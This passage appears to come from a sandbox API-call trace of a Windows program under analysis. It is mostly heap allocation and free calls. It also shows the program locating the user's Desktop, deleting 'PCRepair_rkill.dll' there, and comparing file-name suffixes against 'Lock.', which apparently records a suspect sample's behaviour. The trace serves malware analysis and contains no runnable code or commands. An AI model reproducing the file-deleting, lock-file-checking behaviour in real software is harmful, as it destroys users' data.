returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0203.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0203.901] CloseHandle (hObject=0x2a0) returned 1 [0204.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0204.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0204.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0204.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0204.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0204.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0204.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0204.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0204.248] TranslateMessage (lpMsg=0x8cf708) returned 0 [0204.248] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0204.248] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0204.248] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0204.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0204.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0204.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0204.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0204.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0204.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0204.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0204.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0204.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0204.307] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0204.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0204.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.307] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0204.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0204.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0204.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0204.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0204.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0204.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0204.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0204.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/PCRepair_rkill.dll", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll", lpFilePart=0x8cedf4*="PCRepair_rkill.dll") returned 0x2a [0204.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0204.309] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll")) returned 0x20 [0204.310] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4499b48, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4499b48, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48535dc, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1b81d0, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="PCRepair_rkill.dll", cAlternateFileName="PCREPA~1.DLL")) returned 0xa87250 [0204.310] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll")) returned 1 [0204.320] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4499b48, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4499b48, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48535dc, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1b81d0, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="PCRepair_rkill.dll", cAlternateFileName="PCREPA~1.DLL")) returned 0 [0204.320] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0204.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0204.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0204.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0204.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0204.320] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0204.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0204.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0204.320] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0204.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0204.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0204.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e563a8 [0204.321] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/PCRepair_rkill.dll", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll", lpFilePart=0x8cf650*="PCRepair_rkill.dll") returned 0x2a [0204.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0204.321] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\pcrepair_rkill.dll")) returned 0xffffffff [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0204.322] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0204.322] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.322] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0204.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0204.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0204.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0204.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0204.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGS8H.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0204.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GS8H.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0204.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S8H.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0204.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8H.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0204.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0204.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0204.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0204.323] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0204.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 